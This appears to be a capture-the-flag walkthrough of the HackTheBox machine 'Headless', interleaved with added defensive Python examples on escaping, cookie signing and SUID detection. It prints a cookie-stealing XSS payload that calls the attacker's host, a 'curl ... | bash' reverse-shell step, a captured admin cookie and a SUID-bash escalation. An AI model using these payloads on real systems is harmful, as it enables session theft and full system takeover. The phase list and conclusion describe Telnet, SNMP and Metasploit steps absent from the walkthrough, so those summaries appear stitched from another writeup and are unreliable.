Headless HTB Writeup | HacktheBox


Introduction

In this post, let's see how to solve the Headless machine from HackTheBox. If you have any doubts, comment down below 👇🏾


Hacking Phases in Headless

  1. Getting into the system initially.
  2. Checking open TCP ports using Nmap.
  3. Retrieving information from Telnet banners.
  4. Looking for vulnerabilities to exploit.
  5. Enumerating information through SNMP.
  6. Gaining access to a user shell.
  7. Obtaining the user flag.
  8. Escalating privileges.
  9. Using Metasploit for port forwarding.
  10. Identifying ways to escalate privileges.
  11. Exploiting vulnerabilities like file read to gain access.
  12. Obtaining the root flag.

Let’s Begin

Let’s Hack Headless HTB 😌

Enumeration

Direct link: https://app.hackthebox.com/machines/Headless

Name: Headless

Difficulty: Easy

User points: +20

Root points: +25

OS: Linux

Hi everyone, I want to share a walkthrough of this machine from Season 4, one of the latest. It is based on Linux and has an easy difficulty. Here we find a Cross Site Scripting (XSS) vulnerability that we have to exploit in order to get an administrator cookie, access a restricted page and then establish a connection back to our machine.

User’s Flag:

Let's start the same way as always, with an Nmap scan.

nmap 10.129.131.95 -A -p- -T4

There we find two interesting ports: 22 (SSH) and 5000 (reported by Nmap as upnp). So let's visit the target IP address on this port and see what happens.

Let's try to find additional directories to get more information.

dirsearch -u http://10.129.131.95:5000

If we visit the dashboard we are unable to access it, but the support page is our opportunity to exploit the application and get access to the machine.

Let's try the following payload:

<img src=x onerror=fetch('http://<YourIP>/?c='+document.cookie);>

And what happens if we submit it?

We successfully discovered that it's vulnerable to Cross Site Scripting (XSS). Now we have to use Burp Suite to send our payload, with a web server open in Python to catch the response, and then try to access the dashboard page.

Burp Suite:

We have to modify this request, adding our payload at the end of the User-Agent field, separated from the original value with ";".

I suggest sending it to Repeater (Ctrl+R) and sending it many times, because at first it's hard to get it.
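The reason the User-Agent trick works is that the header is rendered back into an HTML page that an administrator views. The following is an added example, not code from the original writeup or the box: it assumes a Flask-style "report" page (an assumption), shows the unsafe concatenation beside the escaped form, the HttpOnly cookie flag that would have stopped document.cookie exfiltration, and a simple detector for headers carrying inline event handlers.

```python
"""Added example (not from the original writeup): why a request header reflected
into an admin page is dangerous, and how escaping plus an HttpOnly cookie stop
this exact payload. The app layout (a report page listing User-Agents) is an
assumption about the target, not something the writeup shows."""
import html
import re

# The payload used in the writeup, reproduced here only as constructed test input.
PAYLOAD = "<img src=x onerror=fetch('http://<YourIP>/?c='+document.cookie);>"

def render_report_unsafe(user_agent: str) -> str:
    """Vulnerable pattern: the header is concatenated straight into HTML, so the
    browser of whoever views the report executes whatever the client sent."""
    return f"<p>User-Agent: {user_agent}</p>"

def render_report_safe(user_agent: str) -> str:
    """Hardened pattern: html.escape() turns <, >, quotes and & into entities,
    so the header is displayed as text and never parsed as a tag."""
    return f"<p>User-Agent: {html.escape(user_agent, quote=True)}</p>"

def set_cookie_header(name: str, value: str) -> str:
    """Session cookie with HttpOnly: document.cookie cannot read it, so even a
    successful XSS cannot exfiltrate it the way the writeup's payload does."""
    return f"Set-Cookie: {name}={value}; HttpOnly; Secure; SameSite=Lax; Path=/"

# Detection: flag headers carrying a tag with an inline on*= handler, a fetch()
# call, or a reference to document.cookie. Good enough for log review, not a WAF.
SUSPICIOUS = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=|fetch\s*\(|document\.cookie", re.I)

def is_suspicious_user_agent(user_agent: str) -> bool:
    return bool(SUSPICIOUS.search(user_agent))

if __name__ == "__main__":
    print(render_report_unsafe(PAYLOAD))   # tag survives: executes in a browser
    print(render_report_safe(PAYLOAD))     # rendered as harmless text
    print(set_cookie_header("is_admin", "<value>"))
    print(is_suspicious_user_agent("Mozilla/5.0"), is_suspicious_user_agent(PAYLOAD))
```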

Server:

Just start a simple HTTP server with Python on port 80. I suggest using Python; we could do it with PHP, but I got a better response with Python.

python3 -m http.server 80

After a few minutes we got it!

Finally, here's the admin cookie:

Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0

Now, after getting the admin's cookie, we are able to visit the dashboard: change the cookie in the browser and we get this page.
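The cookie above has the shape of a signed value (base64url payload, a dot, then a signature), so it is worth seeing what it actually carries and why simply swapping it in works. This is an added example, not from the writeup or the box: the HMAC scheme is a simplified stand-in for the signer the format resembles, and SECRET is a constructed key (the real server key and derivation are unknown).

```python
"""Added example (not from the original writeup): what the captured cookie
contains and why a signature stops forgery but not replay. The HMAC-SHA256
scheme is a simplified stand-in for the Flask/itsdangerous-style signer the
format resembles; SECRET is constructed, not the server's real key."""
import base64
import hashlib
import hmac
from typing import Optional

COOKIE = "ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0"  # value shown in the writeup
SECRET = b"constructed-demo-key-not-the-real-one"

def b64url_decode(part: str) -> bytes:
    """Payload and signature use base64url without '=' padding; restore it."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def cookie_payload(cookie: str) -> str:
    """The part before the dot is only encoded, not encrypted: anyone can read it."""
    return b64url_decode(cookie.split(".", 1)[0]).decode()

def sign(payload: str, key: bytes) -> str:
    """Simplified signer: base64url(payload).base64url(HMAC-SHA256(key, payload))."""
    mac = hmac.new(key, payload.encode(), hashlib.sha256).digest()
    return f"{b64url_encode(payload.encode())}.{b64url_encode(mac)}"

def verify(cookie: str, key: bytes) -> Optional[str]:
    """Return the payload if the signature matches, else None. The check cannot
    distinguish the real admin from someone replaying a stolen cookie: the bytes
    are identical, which is why HttpOnly and short sessions matter."""
    encoded, sig = cookie.split(".", 1)
    payload = b64url_decode(encoded)
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(sig), expected):
        return None
    return payload.decode()

if __name__ == "__main__":
    print(cookie_payload(COOKIE))           # the identity the server trusts
    issued = sign('"admin"', SECRET)
    print(verify(issued, SECRET))           # genuine cookie verifies
    print(verify(issued, b"wrong-key"))     # without the key, nothing verifies
    print(verify(COOKIE, SECRET))           # real cookie, our constructed key: None
```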

Now we have to establish a connection with our machine. So, let's start a listener with netcat:

nc -lvnp 9000

If we intercept the packet and try to establish a connection with our machine directly, we don't get a correct response.

But what happens if we curl our machine and execute the downloaded script with bash?

curl http://<YourIP>/shell.sh|bash

If we look at our nc listener…

We are in!

Root’s Flag:

Let's see what we are able to do.

If we cat the file and analyse it, we can find that it's manipulating a file named "initdb.sh".

Okay, we can create that file so that it changes the permissions of bash, setting the user (SUID) bit, and then run syscheck.

Finally, run bash:

/bin/bash -p
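The escalation leaves a very visible trace: a SUID bit on /bin/bash, which is what bash -p relies on. As an added example (not part of the writeup), the following compares a stored baseline of SUID files against the current state to flag exactly that change; the baseline and "after" data are constructed, and scan_setuid() can be pointed at real paths.

```python
"""Added example (not from the original writeup): detecting the persistence this
escalation leaves behind, a SUID bit added to /bin/bash. A baseline of known
SUID files is compared with the current state. BASELINE and AFTER are
constructed sample data; scan_setuid() reads real file modes."""
import os
import stat
from typing import Dict, Iterable, List

def is_setuid(mode: int) -> bool:
    """True when the set-user-ID bit is present in a stat() st_mode value."""
    return bool(mode & stat.S_ISUID)

def scan_setuid(paths: Iterable[str]) -> Dict[str, int]:
    """Return {path: permission bits} for regular files that are SUID.
    Paths that do not exist are skipped so the scan works on any host."""
    found: Dict[str, int] = {}
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and is_setuid(st.st_mode):
            found[p] = stat.S_IMODE(st.st_mode)
    return found

def new_setuid(baseline: Dict[str, int], current: Dict[str, int]) -> List[str]:
    """Files that are SUID now but were not in the baseline, or whose mode changed.
    /bin/bash showing up here is the fingerprint of 'chmod u+s /bin/bash'."""
    return sorted(p for p, m in current.items() if baseline.get(p) != m)

# Constructed sample data: a clean baseline and the state after the escalation.
BASELINE = {"/usr/bin/sudo": 0o4755, "/usr/bin/passwd": 0o4755}
AFTER = {"/usr/bin/sudo": 0o4755, "/usr/bin/passwd": 0o4755, "/bin/bash": 0o4755}

if __name__ == "__main__":
    print(new_setuid(BASELINE, AFTER))     # ['/bin/bash']
    print(scan_setuid(["/usr/bin/sudo", "/usr/bin/passwd", "/bin/bash"]))
```

A cron job that stores scan_setuid() output and alerts on a non-empty new_setuid() result catches this technique regardless of which script was abused to plant the bit.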

Cat /root/root.txt and that's all.

Conclusion

This machine offered an enjoyable and educational journey, during which we explored a range of topics such as TCP port scanning, service enumeration, UDP port scanning, SNMP enumeration, exploiting password disclosure vulnerabilities, port forwarding using Metasploit, manual port forwarding, file transfer, understanding file permissions, and exploiting file read vulnerabilities to retrieve the root.txt file through two distinct methods.

FAQs

  1. What is HacktheBox?
    • HacktheBox is an online platform that offers a range of virtual machines for users to practice their penetration testing skills in a legal and controlled environment.
  2. What is "Headless" on HacktheBox?
    • "Headless" refers to one of the machines available on HacktheBox, presenting users with various cybersecurity challenges to overcome.
  3. How do you obtain the user flag?
    • Obtaining the user flag involves exploring the compromised system to locate the designated file containing the flag. This often requires executing commands and navigating through directories.
  4. What is privilege escalation?
    • Privilege escalation is the process of gaining higher levels of access on a system than initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges.
  5. How do you escalate privileges in a hack?
    • Privilege escalation can be achieved by exploiting vulnerabilities such as misconfigured services, weak file permissions, or known software vulnerabilities.
